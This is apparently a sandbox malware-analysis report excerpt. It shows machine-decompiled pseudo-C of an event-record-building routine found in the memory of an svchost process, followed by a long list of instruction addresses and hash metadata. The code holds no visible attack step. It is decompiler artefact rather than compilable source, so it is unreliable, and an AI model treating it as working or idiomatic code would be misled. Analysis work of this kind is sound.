				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03AF4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E03A6D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03AF5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x3b160e8;
								if( *0x3b160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x3b160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03A69710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03A66DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E03A6F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E03A6F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E03A6F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E03A6FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E03A6FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E03A6F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E03A6F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03AF4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E03A7D130(_t427, _t494, _t511);
				}
			}










































































                                          0x03af5ba5
                                          0x03af5baa
                                          0x03af5baf
                                          0x03af5bb4
                                          0x03af5bb6
                                          0x03af5bbc
                                          0x03af5bbe
                                          0x03af5bc4
                                          0x03af5bcd
                                          0x03af5bd3
                                          0x03af5bd6
                                          0x03af5bdc
                                          0x03af5be0
                                          0x03af5be3
                                          0x03af5beb
                                          0x03af5bf2
                                          0x03af5bf8
                                          0x03af5bfe
                                          0x03af5c04
                                          0x03af5c0e
                                          0x03af5c18
                                          0x03af5c1f
                                          0x03af5c25
                                          0x03af5c2a
                                          0x03af5c2c
                                          0x03af5c32
                                          0x03af5c3a
                                          0x03af5c3f
                                          0x03af5c42
                                          0x03af5c48
                                          0x03af5c5b
                                          0x03af5c5b
                                          0x03af5c2c
                                          0x03af5cb7
                                          0x03af5cb9
                                          0x03af5cbf
                                          0x03af5cc2
                                          0x03af5cca
                                          0x03af5ccb
                                          0x03af5ccb
                                          0x03af5cd1
                                          0x03af5cd7
                                          0x03af5cda
                                          0x03af5ce1
                                          0x03af5ce4
                                          0x03af5ce7
                                          0x03af5ced
                                          0x03af5cf3
                                          0x03af5cf9
                                          0x03af5cff
                                          0x03af5d08
                                          0x03af5d0a
                                          0x03af5d0e
                                          0x03af5d10
                                          0x00000000
                                          0x00000000
                                          0x03af5d16
                                          0x03af5d1a
                                          0x00000000
                                          0x00000000
                                          0x03af5d20
                                          0x03af5d22
                                          0x03af5d25
                                          0x03af5d2f
                                          0x03af5d2f
                                          0x03af5d33
                                          0x03af5d3d
                                          0x03af5d49
                                          0x03af5d4b
                                          0x00000000
                                          0x00000000
                                          0x03af5d5a
                                          0x03af5d5d
                                          0x03af5d60
                                          0x00000000
                                          0x00000000
                                          0x03af5d66
                                          0x03af5d69
                                          0x00000000
                                          0x00000000
                                          0x03af5d6f
                                          0x03af5d6f
                                          0x03af5d73
                                          0x03af5d79
                                          0x03af5d7f
                                          0x03af5d86
                                          0x03af5d95
                                          0x03af5d98
                                          0x03af5dba
                                          0x03af5dcb
                                          0x03af5dce
                                          0x03af5dd3
                                          0x03af5dd6
                                          0x03af5dd8
                                          0x03af5de6
                                          0x03af5dec
                                          0x03af5dee
                                          0x03af5df1
                                          0x03af5df3
                                          0x03af635a
                                          0x03af635a
                                          0x00000000
                                          0x03af635a
                                          0x03af5dfe
                                          0x03af5e02
                                          0x03af5e05
                                          0x03af5e07
                                          0x03af5e10
                                          0x03af5e13
                                          0x03af5e1b
                                          0x03af5e1c
                                          0x03af5e21
                                          0x03af5e22
                                          0x03af5e23
                                          0x03af5e25
                                          0x03af5e2a
                                          0x03af5e2c
                                          0x03af5e2e
                                          0x03af5e36
                                          0x03af5e39
                                          0x03af5e42
                                          0x03af5e47
                                          0x03af5e4d
                                          0x03af5e54
                                          0x03af5e54
                                          0x03af5e54
                                          0x03af5e2e
                                          0x03af5e5c
                                          0x03af5e5f
                                          0x03af5e62
                                          0x03af5e64
                                          0x03af5e6b
                                          0x03af5e70
                                          0x03af5e7a
                                          0x03af5e7a
                                          0x03af5e7a
                                          0x03af5e6b
                                          0x03af5e7e
                                          0x03af5e7f
                                          0x03af5e7f
                                          0x03af5e81
                                          0x03af5e87
                                          0x03af5e8b
                                          0x03af5e8c
                                          0x03af5e8c
                                          0x03af5e8c
                                          0x03af5e9a
                                          0x03af5e9c
                                          0x03af5ea2
                                          0x03af5ea6
                                          0x03af5f50
                                          0x03af5f50
                                          0x03af5f57
                                          0x03af5f66
                                          0x03af5f66
                                          0x03af5f66
                                          0x03af5f68
                                          0x03af5f6a
                                          0x03af63d0
                                          0x00000000
                                          0x03af5f70
                                          0x03af5f70
                                          0x03af5f91
                                          0x03af5f9c
                                          0x03af5f9e
                                          0x03af5fa4
                                          0x03af5fa6
                                          0x03af638c
                                          0x03af6392
                                          0x03af63a1
                                          0x03af63a7
                                          0x03af63af
                                          0x03af63af
                                          0x03af63bd
                                          0x03af63d8
                                          0x00000000
                                          0x03af63d8
                                          0x03af5fac
                                          0x03af5fb2
                                          0x03af5fb4
                                          0x03af5fbd
                                          0x03af5fc6
                                          0x03af5fce
                                          0x03af5fd4
                                          0x03af5fdc
                                          0x03af5fec
                                          0x03af5fed
                                          0x03af5fee
                                          0x03af5fef
                                          0x03af5ff9
                                          0x03af5ffa
                                          0x03af5ffb
                                          0x03af5ffc
                                          0x03af6000
                                          0x03af6004
                                          0x03af6012
                                          0x03af6012
                                          0x03af6018
                                          0x03af6019
                                          0x03af601a
                                          0x03af601b
                                          0x03af601c
                                          0x03af6020
                                          0x03af6059
                                          0x03af605c
                                          0x03af6061
                                          0x03af6061
                                          0x03af6022
                                          0x03af6022
                                          0x03af6022
                                          0x03af6025
                                          0x03af602a
                                          0x03af602b
                                          0x03af6031
                                          0x03af6037
                                          0x03af6038
                                          0x03af603e
                                          0x03af6048
                                          0x03af6049
                                          0x03af604a
                                          0x03af604b
                                          0x03af604c
                                          0x03af604d
                                          0x03af6053
                                          0x03af6054
                                          0x03af6054
                                          0x03af6062
                                          0x03af6065
                                          0x03af6067
                                          0x03af606a
                                          0x03af6070
                                          0x03af6075
                                          0x03af6076
                                          0x03af6081
                                          0x03af6087
                                          0x03af6095
                                          0x03af6099
                                          0x03af609e
                                          0x03af60a4
                                          0x03af60ae
                                          0x03af60b0
                                          0x03af60b3
                                          0x03af60b6
                                          0x03af60b8
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60be
                                          0x03af60c0
                                          0x03af60c5
                                          0x03af60c5
                                          0x03af60c5
                                          0x03af60c6
                                          0x03af60cd
                                          0x03af6114
                                          0x03af60cf
                                          0x03af60cf
                                          0x03af60d4
                                          0x03af60d5
                                          0x03af60da
                                          0x03af60db
                                          0x03af60e1
                                          0x03af60e2
                                          0x03af60e8
                                          0x03af60f8
                                          0x03af60fd
                                          0x03af60fe
                                          0x03af6102
                                          0x03af6104
                                          0x03af6107
                                          0x03af6109
                                          0x03af610b
                                          0x03af610b
                                          0x03af610b
                                          0x03af610b
                                          0x03af610f
                                          0x03af610f
                                          0x03af6117
                                          0x03af611a
                                          0x03af611f
                                          0x03af6125
                                          0x03af6134
                                          0x03af6139
                                          0x03af613f
                                          0x03af6146
                                          0x03af6148
                                          0x03af614b
                                          0x03af614d
                                          0x03af614f
                                          0x03af614f
                                          0x03af614f
                                          0x03af614f
                                          0x03af6153
                                          0x03af6159
                                          0x03af6159
                                          0x03af615c
                                          0x03af6163
                                          0x03af6169
                                          0x03af616c
                                          0x03af6172
                                          0x03af6181
                                          0x03af6186
                                          0x03af6187
                                          0x03af618b
                                          0x03af6191
                                          0x03af6195
                                          0x03af61a3
                                          0x03af61bb
                                          0x03af61c0
                                          0x03af61c3
                                          0x03af61cc
                                          0x03af61d0
                                          0x03af61dc
                                          0x03af61de
                                          0x03af61e1
                                          0x03af61e4
                                          0x03af61e6
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e6
                                          0x03af61ec
                                          0x03af61f3
                                          0x03af6203
                                          0x03af6209
                                          0x03af620a
                                          0x03af6216
                                          0x03af621d
                                          0x03af6227
                                          0x03af6241
                                          0x03af6246
                                          0x03af624c
                                          0x03af6257
                                          0x03af6259
                                          0x03af625c
                                          0x03af625e
                                          0x03af6260
                                          0x03af6260
                                          0x03af6260
                                          0x03af6260
                                          0x03af625e
                                          0x03af6264
                                          0x03af6267
                                          0x03af6269
                                          0x03af6315
                                          0x03af6315
                                          0x03af631b
                                          0x03af631e
                                          0x03af6324
                                          0x03af6327
                                          0x03af632f
                                          0x03af6330
                                          0x03af6333
                                          0x03af633a
                                          0x03af633c
                                          0x03af6335
                                          0x03af6335
                                          0x03af6335
                                          0x03af633f
                                          0x03af6342
                                          0x03af634c
                                          0x03af6352
                                          0x03af6355
                                          0x03af6355
                                          0x03af6359
                                          0x00000000
                                          0x03af626f
                                          0x03af6275
                                          0x03af6275
                                          0x03af6278
                                          0x03af627e
                                          0x03af627e
                                          0x03af6281
                                          0x03af6287
                                          0x03af628d
                                          0x03af6298
                                          0x03af629c
                                          0x03af62a2
                                          0x03af629e
                                          0x03af629e
                                          0x03af629e
                                          0x03af62a7
                                          0x03af62a7
                                          0x03af62aa
                                          0x03af62b0
                                          0x03af62f0
                                          0x03af62f0
                                          0x03af62f2
                                          0x03af62f8
                                          0x03af62fd
                                          0x03af62b2
                                          0x03af62b2
                                          0x03af62b2
                                          0x03af62b5
                                          0x03af62dd
                                          0x03af62e2
                                          0x03af62e5
                                          0x03af62b7
                                          0x03af62b8
                                          0x03af62bb
                                          0x03af62bd
                                          0x03af62c0
                                          0x03af62c4
                                          0x03af62cd
                                          0x03af62cd
                                          0x03af62c0
                                          0x03af62bb
                                          0x03af62b5
                                          0x03af6302
                                          0x03af6303
                                          0x03af6305
                                          0x03af6305
                                          0x03af6305
                                          0x03af630c
                                          0x03af630c
                                          0x00000000
                                          0x03af627e
                                          0x03af6269
                                          0x03af5eac
                                          0x03af5ebb
                                          0x03af5ebe
                                          0x03af5ecb
                                          0x03af5ecb
                                          0x03af5ece
                                          0x03af5ece
                                          0x03af5ed4
                                          0x03af5ed7
                                          0x03af5ed9
                                          0x03af5edb
                                          0x03af5edb
                                          0x03af5ee1
                                          0x03af5ee1
                                          0x03af5ee3
                                          0x03af5f20
                                          0x03af5f20
                                          0x03af5ee5
                                          0x03af5ee5
                                          0x03af5ee5
                                          0x03af5ee8
                                          0x03af5f11
                                          0x03af5f18
                                          0x03af5eea
                                          0x03af5eea
                                          0x03af5eed
                                          0x03af5ef2
                                          0x03af5ef8
                                          0x03af5efb
                                          0x03af5f0a
                                          0x03af5f0a
                                          0x03af5eed
                                          0x03af5ee8
                                          0x03af5f22
                                          0x03af5f28
                                          0x00000000
                                          0x00000000
                                          0x03af5f30
                                          0x03af5f31
                                          0x03af5f37
                                          0x03af5f3a
                                          0x03af5f3d
                                          0x03af5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af5f46
                                          0x03af5f48
                                          0x03af5f4d
                                          0x00000000
                                          0x03af5f4d
                                          0x03af5dda
                                          0x03af5ddf
                                          0x00000000
                                          0x03af5ddf
                                          0x03af5dd8
                                          0x03af5da7
                                          0x03af5da9
                                          0x03af5dac
                                          0x03af5dae
                                          0x00000000
                                          0x03af5db4
                                          0x03af5db4
                                          0x00000000
                                          0x03af5db4
                                          0x03af5dae
                                          0x03af5d88
                                          0x03af5d8d
                                          0x03af6363
                                          0x03af6369
                                          0x03af636a
                                          0x03af6370
                                          0x03af6372
                                          0x03af637a
                                          0x03af637b
                                          0x03af637d
                                          0x00000000
                                          0x00000000
                                          0x03af637f
                                          0x03af6385
                                          0x00000000
                                          0x03af6385
                                          0x03af5d38
                                          0x03af5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af5d3b
                                          0x03af5d27
                                          0x03af5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af6360
                                          0x00000000
                                          0x03af6360
                                          0x03af5c10
                                          0x03af5c10
                                          0x03af63da
                                          0x03af63e5
                                          0x03af63e5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 490cfce06282eec4ca219b8c7d6c3dd34f322510b6662e55ec889853d977276a
                                          • Instruction ID: c37edefe195aac27485ff5c6a408459f7a19c91b63caf179a30bc314837a7800
                                          • Opcode Fuzzy Hash: 490cfce06282eec4ca219b8c7d6c3dd34f322510b6662e55ec889853d977276a
